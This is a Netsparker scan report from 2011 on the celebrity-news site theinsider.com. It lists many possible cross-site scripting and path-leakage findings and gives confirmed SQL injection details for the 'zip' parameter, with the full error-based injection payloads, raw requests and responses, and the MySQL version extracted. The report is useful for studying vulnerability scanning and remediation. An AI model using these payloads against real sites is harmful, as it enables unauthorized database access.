SQL Injection, Reflected XSS, Javascript Injection, Zip Parameter, theinsider.com REPORT SUMMARY

Loading



Netsparker - Scan Report Summary
TARGET URL
http://www.theinsider.com/search/index.html?s...
SCAN DATE
12/6/2011 12:53:50 AM
REPORT DATE
12/6/2011 8:38:26 PM
SCAN DURATION
00:43:47

Total Requests

0

Average Speed

0 req/sec.
228
identified
6
confirmed
2
critical
154
informational

CHECK SETTINGS

Scan Settings
PROFILE
Previous Settings
ENABLED ENGINES
DORK
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
CRITICAL
1 %
IMPORTANT
2 %
MEDIUM
29 %
LOW
1 %
INFORMATION
68 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/coincident_iframe.html source GET Cross-site Scripting No
source GET [Possible] Cross-site Scripting No
/contributor/erin_lucas/ Query Based QUERYSTRING [Possible] Cross-site Scripting No
/contributor/erin_lucas/index.html Query Based QUERYSTRING [Possible] Cross-site Scripting No
/contributor/jarett_wieselman/ Query Based QUERYSTRING [Possible] Cross-site Scripting No
/contributor/jarett_wieselman/index.html Query Based QUERYSTRING [Possible] Cross-site Scripting No
/contributor/keltie_colleen/ Query Based QUERYSTRING [Possible] Cross-site Scripting No
/contributor/keltie_colleen/index.html Query Based QUERYSTRING [Possible] Cross-site Scripting No
/crossdomain.xml Crossdomain.xml Identified No
/fashion/ Query Based QUERYSTRING [Possible] Cross-site Scripting No
/fashion/45745_Willow_Smith_Fashion_Time_Warp/ [Possible] Internal Path Leakage (*nix) No
/fashion/45745_Willow_Smith_Fashion_Time_Warp/index.html [Possible] Internal Path Leakage (*nix) No
/fashion/45875_Julianne_Hough_Fashion_Time_Warp/ [Possible] Internal Path Leakage (*nix) No
/fashion/45875_Julianne_Hough_Fashion_Time_Warp/index.html [Possible] Internal Path Leakage (*nix) No
/fashion/45969_RHOBH_Kyle_Richards_Brooke_Anderson_Facial/ [Possible] Internal Path Leakage (*nix) No
/fashion/45969_RHOBH_Kyle_Richards_Brooke_Anderson_Facial/index.html [Possible] Internal Path Leakage (*nix) No
/fashion/46012_Stars_Celebrate_Christian_Louboutin_s_New_Book/ [Possible] Internal Path Leakage (*nix) No
/fashion/46012_Stars_Celebrate_Christian_Louboutin_s_New_Book/index.html [Possible] Internal Path Leakage (*nix) No
/fashion/46327_Mary_Kate_Olsen_Fashion_Time_Warp/ [Possible] Internal Path Leakage (*nix) No
/fashion/46327_Mary_Kate_Olsen_Fashion_Time_Warp/index.html [Possible] Internal Path Leakage (*nix) No
/fashion/46420_Mike_The_Situation_Sorrentino_Rates_AMA_Fashion_in_Fist_Pumps/ [Possible] Internal Path Leakage (*nix) No
/fashion/46420_Mike_The_Situation_Sorrentino_Rates_AMA_Fashion_in_Fist_Pumps/index.html [Possible] Internal Path Leakage (*nix) No
/fashion/46459_Jennifer_Love_Hewitt_Fashion_Time_Warp/ [Possible] Internal Path Leakage (*nix) No
/fashion/46459_Jennifer_Love_Hewitt_Fashion_Time_Warp/index.html [Possible] Internal Path Leakage (*nix) No
/fashion/46782_Carolina_Herrera_Talks_Breaking_Dawn_Wedding_Dress/ [Possible] Internal Path Leakage (*nix) No
/fashion/46782_Carolina_Herrera_Talks_Breaking_Dawn_Wedding_Dress/index.html [Possible] Internal Path Leakage (*nix) No
/fashion/46896_Cobie_Smulders_Fashion_Time_Warp/ [Possible] Internal Path Leakage (*nix) No
/fashion/46896_Cobie_Smulders_Fashion_Time_Warp/index.html [Possible] Internal Path Leakage (*nix) No
/fashion/46942_That_s_Enough_Chloe_Moretz/ [Possible] Internal Path Leakage (*nix) No
/fashion/46942_That_s_Enough_Chloe_Moretz/index.html [Possible] Internal Path Leakage (*nix) No
/fashion/46944_Lady_Gaga_s_X_Rated_Secret_to_Good_Skin/ [Possible] Internal Path Leakage (*nix) No
/fashion/46944_Lady_Gaga_s_X_Rated_Secret_to_Good_Skin/index.html [Possible] Internal Path Leakage (*nix) No
/fashion/47105_Emily_Blunt_s_Opium_YSL_ad/ [Possible] Internal Path Leakage (*nix) No
/fashion/47105_Emily_Blunt_s_Opium_YSL_ad/index.html [Possible] Internal Path Leakage (*nix) No
/fashion/index.html Query Based QUERYSTRING [Possible] Cross-site Scripting No
/gallery/40403_EXCLUSIVE_PICS_Pippa_and_Kate_Middleton_s_Bikini_Vacation/ Query Based QUERYSTRING [Possible] Cross-site Scripting No
/gallery/40403_EXCLUSIVE_PICS_Pippa_and_Kate_Middleton_s_Bikini_Vacation/index.html Query Based QUERYSTRING [Possible] Cross-site Scripting No
/gossip/ Query Based QUERYSTRING [Possible] Cross-site Scripting No
page GET Internal Server Error Yes
/gossip/38520_Celebrity_Couples_Status_Update/ Query Based QUERYSTRING [Possible] Cross-site Scripting No
/gossip/38520_Celebrity_Couples_Status_Update/index.html Query Based QUERYSTRING [Possible] Cross-site Scripting No
/gossip/43330_Watch_Snooki_Gets_Serious_with_New_Boyfriend/ Query Based QUERYSTRING [Possible] Cross-site Scripting No
/gossip/43330_Watch_Snooki_Gets_Serious_with_New_Boyfriend/index.html Query Based QUERYSTRING [Possible] Cross-site Scripting No
/gossip/43339_Miranda_Cosgrove_Escapes_Life_Threatening_Crash/ Query Based QUERYSTRING [Possible] Cross-site Scripting No
/gossip/43339_Miranda_Cosgrove_Escapes_Life_Threatening_Crash/index.html Query Based QUERYSTRING [Possible] Cross-site Scripting No
/gossip/43359_Kelly_Osbourne_s_Tense_Paparazzi_Confrontation_video/ Query Based QUERYSTRING [Possible] Cross-site Scripting No
/gossip/43359_Kelly_Osbourne_s_Tense_Paparazzi_Confrontation_video/index.html Query Based QUERYSTRING [Possible] Cross-site Scripting No
/gossip/43370_Say_What_Heidi_Montag_the_Book_Lover/ Query Based QUERYSTRING [Possible] Cross-site Scripting No
/gossip/43370_Say_What_Heidi_Montag_the_Book_Lover/index.html Query Based QUERYSTRING [Possible] Cross-site Scripting No
/gossip/46369_Sharon_Stone_Supports_Our_Troops/ [Possible] Internal Path Leakage (*nix) No
/gossip/46369_Sharon_Stone_Supports_Our_Troops/index.html [Possible] Internal Path Leakage (*nix) No
/gossip/46419_Katy_Perry_on_Pregnancy_and_Baby_Rumors/ [Possible] Internal Path Leakage (*nix) No
/gossip/46419_Katy_Perry_on_Pregnancy_and_Baby_Rumors/index.html [Possible] Internal Path Leakage (*nix) No
/gossip/46570_Simon_Cowell_Has_Made_Some_Stupid_Decisions/ [Possible] Internal Path Leakage (*nix) No
/gossip/46570_Simon_Cowell_Has_Made_Some_Stupid_Decisions/index.html [Possible] Internal Path Leakage (*nix) No
/gossip/46587_Was_There_Another_Witness_in_the_Natalie_Wood_Case/ [Possible] Internal Path Leakage (*nix) No
/gossip/46587_Was_There_Another_Witness_in_the_Natalie_Wood_Case/index.html [Possible] Internal Path Leakage (*nix) No
/gossip/46839_A_Friend_Recalls_Natalie_Wood_s_Passing/ [Possible] Internal Path Leakage (*nix) No
/gossip/46839_A_Friend_Recalls_Natalie_Wood_s_Passing/index.html [Possible] Internal Path Leakage (*nix) No
/gossip/46863_Inside_Donald_Eric_s_World_Atop_Trump_Tower/ [Possible] Internal Path Leakage (*nix) No
/gossip/46863_Inside_Donald_Eric_s_World_Atop_Trump_Tower/index.html [Possible] Internal Path Leakage (*nix) No
/gossip/46928_Pop_Culture_Rewind_Princess_Diaries/ [Possible] Internal Path Leakage (*nix) No
/gossip/46928_Pop_Culture_Rewind_Princess_Diaries/index.html [Possible] Internal Path Leakage (*nix) No
/gossip/46999_5_Things_You_Don_t_Know_About_Melissa_McCarthy/ [Possible] Internal Path Leakage (*nix) No
/gossip/46999_5_Things_You_Don_t_Know_About_Melissa_McCarthy/index.html [Possible] Internal Path Leakage (*nix) No
/gossip/47064_Jennifer_Aniston_s_Dad_Approves_of_Justin_Theroux/ [Possible] Internal Path Leakage (*nix) No
/gossip/47064_Jennifer_Aniston_s_Dad_Approves_of_Justin_Theroux/index.html [Possible] Internal Path Leakage (*nix) No
/gossip/index.html Query Based QUERYSTRING [Possible] Cross-site Scripting No
/inc/huffpost/display/43462_Huffpost_Display/ Query Based QUERYSTRING [Possible] Cross-site Scripting No
/inc/huffpost/display/43462_Huffpost_Display/index.html Query Based QUERYSTRING [Possible] Cross-site Scripting No
/insiderontv/ Query Based QUERYSTRING [Possible] Cross-site Scripting No
/insiderontv/index.html Query Based QUERYSTRING [Possible] Cross-site Scripting No
/lol/ Query Based QUERYSTRING [Possible] Cross-site Scripting No
/lol/45583_Darren_Criss_sings_Disney_classics/ [Possible] Internal Path Leakage (*nix) No
/lol/45583_Darren_Criss_sings_Disney_classics/index.html [Possible] Internal Path Leakage (*nix) No
/lol/45716_ANTM_Music_Videos/ [Possible] Internal Path Leakage (*nix) No
/lol/45716_ANTM_Music_Videos/index.html [Possible] Internal Path Leakage (*nix) No
/lol/45940_Ridiculousness_Clip/ [Possible] Internal Path Leakage (*nix) No
/lol/45940_Ridiculousness_Clip/index.html [Possible] Internal Path Leakage (*nix) No
/lol/46001_Viral_Guilty_Pleasure_Kid_Dancing_to_MJ_While_Doing_Dishes/ [Possible] Internal Path Leakage (*nix) No
/lol/46001_Viral_Guilty_Pleasure_Kid_Dancing_to_MJ_While_Doing_Dishes/index.html [Possible] Internal Path Leakage (*nix) No
/lol/46129_Miss_Piggy_on_Pretty_Little_Liars/ [Possible] Internal Path Leakage (*nix) No
/lol/46129_Miss_Piggy_on_Pretty_Little_Liars/index.html [Possible] Internal Path Leakage (*nix) No
/lol/46252_Marcel_the_Shell_new_video/ [Possible] Internal Path Leakage (*nix) No
/lol/46252_Marcel_the_Shell_new_video/index.html [Possible] Internal Path Leakage (*nix) No
/lol/46343_Neil_Patrick_Harris_Accepts_Rand_Schrader_Distinguished_Achievement_Award/ [Possible] Internal Path Leakage (*nix) No
/lol/46343_Neil_Patrick_Harris_Accepts_Rand_Schrader_Distinguished_Achievement_Award/index.html [Possible] Internal Path Leakage (*nix) No
/lol/46438_Becki_Newton_talks_How_I_Met_Your_Mother/ [Possible] Internal Path Leakage (*nix) No
/lol/46438_Becki_Newton_talks_How_I_Met_Your_Mother/index.html [Possible] Internal Path Leakage (*nix) No
/lol/46443_Margaret_Cho_Releases_Cho_Dependant/ [Possible] Internal Path Leakage (*nix) No
/lol/46443_Margaret_Cho_Releases_Cho_Dependant/index.html [Possible] Internal Path Leakage (*nix) No
/lol/46786_Katy_Perry_Wigs_Out/ [Possible] Internal Path Leakage (*nix) No
/lol/46786_Katy_Perry_Wigs_Out/index.html [Possible] Internal Path Leakage (*nix) No
/lol/46919_Virgin_Diaries_Trailer/ [Possible] Internal Path Leakage (*nix) No
/lol/46919_Virgin_Diaries_Trailer/index.html [Possible] Internal Path Leakage (*nix) No
/lol/46947_Tom_Cruise_dances_with_Stacy_Francis/ [Possible] Internal Path Leakage (*nix) No
/lol/46947_Tom_Cruise_dances_with_Stacy_Francis/index.html [Possible] Internal Path Leakage (*nix) No
/lol/46973_Maya_Rudolph_As_Whitney_Houston_back_on_Saturday_Night_Live/ [Possible] Internal Path Leakage (*nix) No
/lol/46973_Maya_Rudolph_As_Whitney_Houston_back_on_Saturday_Night_Live/index.html [Possible] Internal Path Leakage (*nix) No
/lol/46979_Kids_Funny_Reaction_to_Spiderman_Kiss/ [Possible] Internal Path Leakage (*nix) No
/lol/46979_Kids_Funny_Reaction_to_Spiderman_Kiss/index.html [Possible] Internal Path Leakage (*nix) No
/lol/index.html Query Based QUERYSTRING [Possible] Cross-site Scripting No
/media/flash/coincident/ E-mail Address Disclosure No
/media/flash/coincident/index.html media GET [Possible] Cross-site Scripting No
media GET [Possible] Cross-site Scripting No
media GET [Possible] Cross-site Scripting No
media GET [Possible] Cross-site Scripting No
media GET [Possible] Cross-site Scripting No
media GET [Possible] Cross-site Scripting No
media GET [Possible] Cross-site Scripting No
/media/flash/coincident/popOutPlayer.html media GET [Possible] Cross-site Scripting No
/media/flash/visitcalifornia/index.html vid GET Cross-site Scripting No
vid GET [Possible] Cross-site Scripting No
/movies/ Query Based QUERYSTRING Cross-site Scripting Yes
/movies/45876_New_James_Bond_movie_Skyfall/ [Possible] Internal Path Leakage (*nix) No
/movies/45876_New_James_Bond_movie_Skyfall/index.html [Possible] Internal Path Leakage (*nix) No
/movies/46294_Elle_and_Dakota_Fanning_on_W_Magazine/ [Possible] Internal Path Leakage (*nix) No
/movies/46294_Elle_and_Dakota_Fanning_on_W_Magazine/index.html [Possible] Internal Path Leakage (*nix) No
/movies/46365_Jonathan_Lipnicki_Doesn_t_Want_to_Be_Typecast/ [Possible] Internal Path Leakage (*nix) No
/movies/46365_Jonathan_Lipnicki_Doesn_t_Want_to_Be_Typecast/index.html [Possible] Internal Path Leakage (*nix) No
/movies/46433_Joe_Mangianiello_Interview/ [Possible] Internal Path Leakage (*nix) No
/movies/46433_Joe_Mangianiello_Interview/index.html [Possible] Internal Path Leakage (*nix) No
/movies/46469_Jacqueline_Emerson_talks_Hunger_Games/ [Possible] Internal Path Leakage (*nix) No
/movies/46469_Jacqueline_Emerson_talks_Hunger_Games/index.html [Possible] Internal Path Leakage (*nix) No
/movies/46831_30_Minutes_or_Less_Clip/ [Possible] Internal Path Leakage (*nix) No
/movies/46831_30_Minutes_or_Less_Clip/index.html [Possible] Internal Path Leakage (*nix) No
/movies/46940_Matt_Damon_and_Scarlett_Johansson_on_We_Bought_a_Zoo/ [Possible] Internal Path Leakage (*nix) No
/movies/46940_Matt_Damon_and_Scarlett_Johansson_on_We_Bought_a_Zoo/index.html [Possible] Internal Path Leakage (*nix) No
/movies/46945_Carrie_Preston_Talks_Good_Wife_return_Thats_What_She_Said_in_Sundance/ [Possible] Internal Path Leakage (*nix) No
/movies/46945_Carrie_Preston_Talks_Good_Wife_return_Thats_What_She_Said_in_Sundance/index.html [Possible] Internal Path Leakage (*nix) No
/movies/46948_Dark_Knight_IMAX_theaters/ [Possible] Internal Path Leakage (*nix) No
/movies/46948_Dark_Knight_IMAX_theaters/index.html [Possible] Internal Path Leakage (*nix) No
/movies/46976_Heather_Graham_receives_Career_Achievement_Award/ [Possible] Internal Path Leakage (*nix) No
/movies/46976_Heather_Graham_receives_Career_Achievement_Award/index.html [Possible] Internal Path Leakage (*nix) No
/movies/46977_December_4_2011_box_office_Twilight_Muppets_Shame/ [Possible] Internal Path Leakage (*nix) No
/movies/46977_December_4_2011_box_office_Twilight_Muppets_Shame/index.html [Possible] Internal Path Leakage (*nix) No
/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/ [Possible] Internal Path Leakage (*nix) No
/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html [Possible] Internal Path Leakage (*nix) No
/movies/46996_Cabin_in_the_Woods_trailer/ [Possible] Internal Path Leakage (*nix) No
/movies/46996_Cabin_in_the_Woods_trailer/index.html [Possible] Internal Path Leakage (*nix) No
/movies/index.html Query Based QUERYSTRING [Possible] Cross-site Scripting No
/music/ Query Based QUERYSTRING [Possible] Cross-site Scripting No
/music/46409_Noel_Gallagher_To_Sing_Bond_Theme/ [Possible] Internal Path Leakage (*nix) No
/music/46409_Noel_Gallagher_To_Sing_Bond_Theme/index.html [Possible] Internal Path Leakage (*nix) No
/music/46454_Javier_Colon_Talks_About_What_s_Next_at_the_2011_AMA_Gift_Suite/ [Possible] Internal Path Leakage (*nix) No
/music/46868_Hot_Chelle_Rae_Giveaway_and_interview/ [Possible] Internal Path Leakage (*nix) No
/music/46868_Hot_Chelle_Rae_Giveaway_and_interview/index.html [Possible] Internal Path Leakage (*nix) No
/music/46958_Javier_Colon_Exclusive_sneak_peek/ [Possible] Internal Path Leakage (*nix) No
/music/46958_Javier_Colon_Exclusive_sneak_peek/index.html [Possible] Internal Path Leakage (*nix) No
/music/46983_Madonna_Super_Bowl_Halftime_Show_confirmed/ [Possible] Internal Path Leakage (*nix) No
/music/46983_Madonna_Super_Bowl_Halftime_Show_confirmed/index.html [Possible] Internal Path Leakage (*nix) No
/music/46987_Erin_Lucas_Playlist_December_6/ [Possible] Internal Path Leakage (*nix) No
/music/46987_Erin_Lucas_Playlist_December_6/index.html [Possible] Internal Path Leakage (*nix) No
/music/47065_Cody_Simpson_not_dating_Kylie_Jenner/ [Possible] Internal Path Leakage (*nix) No
/music/47065_Cody_Simpson_not_dating_Kylie_Jenner/index.html [Possible] Internal Path Leakage (*nix) No
/music/47066_Common_and_John_Legend_Will_Make_You_Believers/ [Possible] Internal Path Leakage (*nix) No
/music/47066_Common_and_John_Legend_Will_Make_You_Believers/index.html [Possible] Internal Path Leakage (*nix) No
/music/index.html Query Based QUERYSTRING [Possible] Cross-site Scripting No
/photos/ Query Based QUERYSTRING [Possible] Cross-site Scripting No
/photos/index.html Query Based QUERYSTRING Cross-site Scripting Yes
/screen/ Query Based QUERYSTRING [Possible] Cross-site Scripting No
/screen/43183_Anne_Hathaway_as_Catwoman_in_The_Dark_Knight_Rises/ Query Based QUERYSTRING [Possible] Cross-site Scripting No
/screen/43183_Anne_Hathaway_as_Catwoman_in_The_Dark_Knight_Rises/index.html Query Based QUERYSTRING [Possible] Cross-site Scripting No
/screen/43693_Happy_Endings_Cast_Talks_Season_Two/ Query Based QUERYSTRING [Possible] Cross-site Scripting No
/screen/43693_Happy_Endings_Cast_Talks_Season_Two/index.html Query Based QUERYSTRING [Possible] Cross-site Scripting No
/search/index.html q POST [Possible] Cross-site Scripting No
q POST [Possible] Cross-site Scripting No
q POST [Possible] Cross-site Scripting No
/showfinder_php.php zip GET SQL Injection Yes
zip GET [Probable] SQL Injection No
zip GET [Possible] Cross-site Scripting No
zip GET Database Error Message No
MySQL Database Identified Yes
MySQL Version Is Out Of Date No
/thelook/ Query Based QUERYSTRING [Possible] Cross-site Scripting No
/thelook/42469_Say_What_LeAnn_Rimes_Defends_Too_Skinny_Claims_with_Bikini_Shots_PICS/ Query Based QUERYSTRING [Possible] Cross-site Scripting No
/thelook/42469_Say_What_LeAnn_Rimes_Defends_Too_Skinny_Claims_with_Bikini_Shots_PICS/index.html Query Based QUERYSTRING [Possible] Cross-site Scripting No
/thelook/44064_Say_What_Tyra_Banks_Doesn_t_Shave_Her_Legs/ Query Based QUERYSTRING [Possible] Cross-site Scripting No
/thelook/44064_Say_What_Tyra_Banks_Doesn_t_Shave_Her_Legs/index.html Query Based QUERYSTRING [Possible] Cross-site Scripting No
/thelook/45315_Uma_Thurman_s_Va_Va_Voom_Hair/ Query Based QUERYSTRING [Possible] Cross-site Scripting No
/thelook/45315_Uma_Thurman_s_Va_Va_Voom_Hair/index.html Query Based QUERYSTRING [Possible] Cross-site Scripting No
/tunes/ Query Based QUERYSTRING [Possible] Cross-site Scripting No
/tunes/43255_MUTEMATH_Blood_Pressure_Song_Premiere/ Query Based QUERYSTRING [Possible] Cross-site Scripting No
/tunes/43255_MUTEMATH_Blood_Pressure_Song_Premiere/index.html Query Based QUERYSTRING [Possible] Cross-site Scripting No
/tunes/44339_Lonely_Island_Perform_at_2011_Emmys/ Query Based QUERYSTRING [Possible] Cross-site Scripting No
/tv/ Query Based QUERYSTRING Cross-site Scripting Yes
/tv/44947_Happy_Endings_Halloween_episode/ Query Based QUERYSTRING [Possible] Cross-site Scripting No
/tv/44947_Happy_Endings_Halloween_episode/index.html Query Based QUERYSTRING [Possible] Cross-site Scripting No
/tv/46754_Simon_Cowell_Wants_Jennifer_Lopez_as_a_Judge/ [Possible] Internal Path Leakage (*nix) No
/tv/46754_Simon_Cowell_Wants_Jennifer_Lopez_as_a_Judge/index.html [Possible] Internal Path Leakage (*nix) No
/tv/46788_Smallville_Clip_with_Christopher_Reeve/ [Possible] Internal Path Leakage (*nix) No
/tv/46788_Smallville_Clip_with_Christopher_Reeve/index.html [Possible] Internal Path Leakage (*nix) No
/tv/46865_American_Idol_Season_11_Commercial/ [Possible] Internal Path Leakage (*nix) No
/tv/46865_American_Idol_Season_11_Commercial/index.html [Possible] Internal Path Leakage (*nix) No
/tv/46892_Michael_Jackson_s_Kids_at_X_Factor_Tribute/ [Possible] Internal Path Leakage (*nix) No
/tv/46892_Michael_Jackson_s_Kids_at_X_Factor_Tribute/index.html [Possible] Internal Path Leakage (*nix) No
/tv/46903_Good_Vibes_clip/ [Possible] Internal Path Leakage (*nix) No
/tv/46903_Good_Vibes_clip/index.html [Possible] Internal Path Leakage (*nix) No
/tv/46956_Tom_Hardy_in_The_Take/ [Possible] Internal Path Leakage (*nix) No
/tv/46956_Tom_Hardy_in_The_Take/index.html [Possible] Internal Path Leakage (*nix) No
/tv/46974_Hung_season_finale_clip/ [Possible] Internal Path Leakage (*nix) No
/tv/46974_Hung_season_finale_clip/index.html [Possible] Internal Path Leakage (*nix) No
/tv/46985_Kourtney_and_Kim_Take_New_York_Recap_Episode_2/ [Possible] Internal Path Leakage (*nix) No
/tv/46985_Kourtney_and_Kim_Take_New_York_Recap_Episode_2/index.html [Possible] Internal Path Leakage (*nix) No
/tv/46994_Happy_Endings_Christmas_episode_clip/ [Possible] Internal Path Leakage (*nix) No
/tv/46994_Happy_Endings_Christmas_episode_clip/index.html [Possible] Internal Path Leakage (*nix) No
/tv/47106_Tyra_Banks_on_the_Out_of_This_World_ANTM_Finale/ [Possible] Internal Path Leakage (*nix) No
/tv/47106_Tyra_Banks_on_the_Out_of_This_World_ANTM_Finale/index.html [Possible] Internal Path Leakage (*nix) No
/tv/index.html Query Based QUERYSTRING [Possible] Cross-site Scripting No
/video/ [Possible] Internal Path Leakage (*nix) No
/video/index.html [Possible] Internal Path Leakage (*nix) No
/visitcalifornia/ [Possible] Internal Path Leakage (*nix) No
/visitcalifornia/45896_Where_the_Stars_Shop/ [Possible] Internal Path Leakage (*nix) No
/visitcalifornia/45896_Where_the_Stars_Shop/index.html [Possible] Internal Path Leakage (*nix) No
/visitcalifornia/46344_California_Inspires_Movie_Magic/ [Possible] Internal Path Leakage (*nix) No
/visitcalifornia/46344_California_Inspires_Movie_Magic/index.html [Possible] Internal Path Leakage (*nix) No
/visitcalifornia/46442_Wolfgang_Puck_on_Pioneering_California_Cuisine/ [Possible] Internal Path Leakage (*nix) No
/visitcalifornia/46442_Wolfgang_Puck_on_Pioneering_California_Cuisine/index.html [Possible] Internal Path Leakage (*nix) No
/visitcalifornia/46446_Inside_Wolfgang_Puck_s_Kitchen/ [Possible] Internal Path Leakage (*nix) No
/visitcalifornia/46446_Inside_Wolfgang_Puck_s_Kitchen/index.html [Possible] Internal Path Leakage (*nix) No
/visitcalifornia/46588_Dining_With_The_Stars_Celeb_Owned_Restaurants/ [Possible] Internal Path Leakage (*nix) No
/visitcalifornia/46588_Dining_With_The_Stars_Celeb_Owned_Restaurants/index.html [Possible] Internal Path Leakage (*nix) No
/visitcalifornia/46834_Putting_the_Motion_in_Motion_Pictures/ [Possible] Internal Path Leakage (*nix) No
/visitcalifornia/46834_Putting_the_Motion_in_Motion_Pictures/index.html [Possible] Internal Path Leakage (*nix) No
/visitcalifornia/46836_The_Classic_Cars_of_the_Big_Screen/ [Possible] Internal Path Leakage (*nix) No
/visitcalifornia/46836_The_Classic_Cars_of_the_Big_Screen/index.html [Possible] Internal Path Leakage (*nix) No
/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/ [Possible] Internal Path Leakage (*nix) No
/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html [Possible] Internal Path Leakage (*nix) No
SQL Injection

SQL Injection

1 TOTAL
CRITICAL
CONFIRMED
1
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL Query on the back-end database.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
  4. Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.

Remedy

A robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

Classification

OWASP A1 PCI v1.2-6.5.2 PCI v2.0-6.5.1 CWE-89 CAPEC-66 WASC-19
- /showfinder_php.php

/showfinder_php.php CONFIRMED

http://www.theinsider.com/showfinder_php.php?zip='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cc..

Parameters

Parameter Type Value
zip GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

Extracted Data

5.0.45-standard-log

Request

GET /showfinder_php.php?zip='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
Referer: http://www.theinsider.com/media/flash/coincident/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 07:17:25 GMT
Content-Length: 61
Connection: keep-alive


Duplicate entry '_!@4dilemma:0' for key 1
[Probable] SQL Injection

[Probable] SQL Injection

1 TOTAL
CRITICAL
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even though Netsparker believes that there is a SQL Injection in here it could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us, in order that we can address this issue for the next time and give you a more precise result.

Impact

Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL) within the architecture consider its benefits and implement if appropriate. As a minimum the use of s DAL will help centralize the issue and its resolution. You can also use an ORM (object relational mapping). Most ORM systems use parameterized queries and this can solve many if not all SQL Injection based problems.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
  4. Monitor and review weblogs and application logs in order to uncover active or previous exploitation attempts.

Remedy

A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

Classification

OWASP A1 PCI v1.2-6.5.2 PCI v2.0-6.5.1 CWE-89 CAPEC-66 WASC-19
- /showfinder_php.php

/showfinder_php.php

http://www.theinsider.com/showfinder_php.php?zip='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCH..

Parameters

Parameter Type Value
zip GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /showfinder_php.php?zip='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://www.theinsider.com/media/flash/coincident/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 07:17:22 GMT
Content-Length: 169
Connection: keep-alive


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 1
Cross-site Scripting

Cross-site Scripting

5 TOTAL
